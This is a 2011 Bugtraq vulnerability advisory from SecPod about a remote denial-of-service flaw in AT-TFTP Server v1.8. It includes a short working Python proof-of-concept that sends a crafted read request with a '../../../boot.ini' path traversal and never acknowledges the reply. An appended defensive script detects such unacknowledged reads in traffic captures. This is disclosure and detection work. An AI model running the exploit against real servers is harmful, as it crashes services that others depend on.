AT-TFTP Server Remote Denial of Service Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: AT-TFTP Server Remote Denial of Service Vulnerability
- From: SecPod Research <research@xxxxxxxxxx>
- Date: Mon, 25 Apr 2011 15:31:19 +0530
Hi,
SecPod Research Team Member Antu Sanadi has found a DoS
Vulnerability in AT-TFTP Server.
Advisory and POC details have been attached to this mail.
Regards,
SecPod Research Team
http://www.secpod.com
###############################################################################
AT-TFTP Server v1.8 Remote Denial of Service Vulnerability
SecPod Technologies (www.secpod.com)
Author: Antu Sanadi
###############################################################################
SecPod ID: 1013
01/04/2011 Issue Discovered
04/04/2011 Vendor Notified
No Response from the Vendor
25/04/2011 Advisory Released
Class: Denial of Service
Severity: High
Overview:
---------
AT-TFTP Server v1.8 is prone to a remote Denial of Service vulnerability
as it fails to handle 'read' requests from the client properly.
Technical Description:
----------------------
The vulnerability is caused by an error in the "TFTPD.EXE" which causes the
server to crash when no acknowledgement response is sent back to the server
after a successful 'read'.
Impact:
--------
Successful exploitation could allow an attacker to crash a vulnerable server.
Affected Software:
------------------
AT-TFTP Server version 1.8
Tested on,
AT-TFTP Server version 1.8 on Windows XP SP3
References:
-----------
http://secpod.org/blog/?p=194
http://www.alliedtelesis.co.nz/
http://secpod.org/SecPod_AT_TFTP_DoS-POC.py
http://secpod.org/advisories/SecPod_AT_TFTP_DoS.txt
Proof of Concept:
----------------
http://secpod.org/blog/?p=194
http://secpod.org/SecPod_AT_TFTP_DoS-POC.py
Solution:
----------
Not available
Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = LOW
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT = COMPLETE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 7.8 (High) (AV:N/AC:L/Au:N/C:N/I:N/A:C)
Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of this
vulnerability.
#!/usr/bin/python
##############################################################################
# Exploit : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX
#           http://secpod.org/wintftp_dos_poc.py
# Reference :
# Author : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################
import socket
import sys

host = '127.0.0.1'
port = 69

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except socket.error:
    print("socket() failed")
    sys.exit(1)

addr = (host, port)

# TFTP read request (opcode 1) for "../../../boot.ini" in "netascii" mode.
# Nothing further is sent, so the server's DATA block is never acknowledged.
data = b'\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\
       b'\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
s.sendto(data, addr)
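
For defenders, the condition in the Technical Description (a read request answered with DATA that the client never acknowledges) can be looked for in captured TFTP traffic. The following is an added example, not part of the SecPod advisory or PoC; the record layout `(timestamp, src, dst, udp_payload)`, the function names, the 5-second timeout and the sample capture are assumptions made for illustration.

```python
import struct

RRQ, DATA, ACK = 1, 3, 4
TFTP_PORT = 69

def parse_tftp(payload):
    """Return (opcode, value) for an RFC 1350 packet, or None if malformed."""
    if len(payload) < 4:
        return None
    opcode = struct.unpack("!H", payload[:2])[0]
    if opcode == RRQ:
        parts = payload[2:].split(b"\x00")
        if len(parts) < 3 or not parts[0]:
            return None
        return opcode, parts[0].decode("ascii", "replace")  # filename
    if opcode in (DATA, ACK):
        return opcode, struct.unpack("!H", payload[2:4])[0]  # block number
    return opcode, None

def unacked_reads(packets, timeout=5.0):
    """packets: (timestamp, src, dst, udp_payload), src/dst = (ip, port).
    Returns [(client, filename, block)] for DATA left unacknowledged >= timeout."""
    sessions, last_ts = {}, 0.0   # client endpoint -> state of its latest read
    for ts, src, dst, payload in packets:
        last_ts = max(last_ts, ts)
        parsed = parse_tftp(payload)
        if parsed is None:
            continue
        opcode, value = parsed
        if opcode == RRQ and dst[1] == TFTP_PORT:
            sessions[src] = {"file": value, "block": None, "sent": None}
        elif opcode == DATA and dst in sessions:
            sessions[dst].update(block=value, sent=ts)
        elif opcode == ACK and src in sessions and sessions[src]["block"] == value:
            sessions[src]["sent"] = None   # latest block acknowledged
    return [(c, s["file"], s["block"]) for c, s in sessions.items()
            if s["sent"] is not None and last_ts - s["sent"] >= timeout]

# Constructed capture (documentation addresses): A completes its read, B never ACKs.
SRV, A, B = ("192.0.2.10", 69), ("192.0.2.20", 40001), ("192.0.2.30", 40002)
SAMPLE = [
    (0.0, A, SRV, b"\x00\x01config.txt\x00octet\x00"),
    (0.1, (SRV[0], 50001), A, b"\x00\x03\x00\x01" + b"x" * 10),
    (0.2, A, (SRV[0], 50001), b"\x00\x04\x00\x01"),
    (1.0, B, SRV, b"\x00\x01boot.ini\x00netascii\x00"),
    (1.1, (SRV[0], 50002), B, b"\x00\x03\x00\x01" + b"y" * 10),
    (9.0, A, SRV, b"\x00\x01config.txt\x00octet\x00"),
]
print(unacked_reads(SAMPLE))
```

Clients also abandon transfers because of packet loss, so a hit is a lead to correlate with a TFTPD.EXE crash or service restart on the server, not proof of abuse on its own.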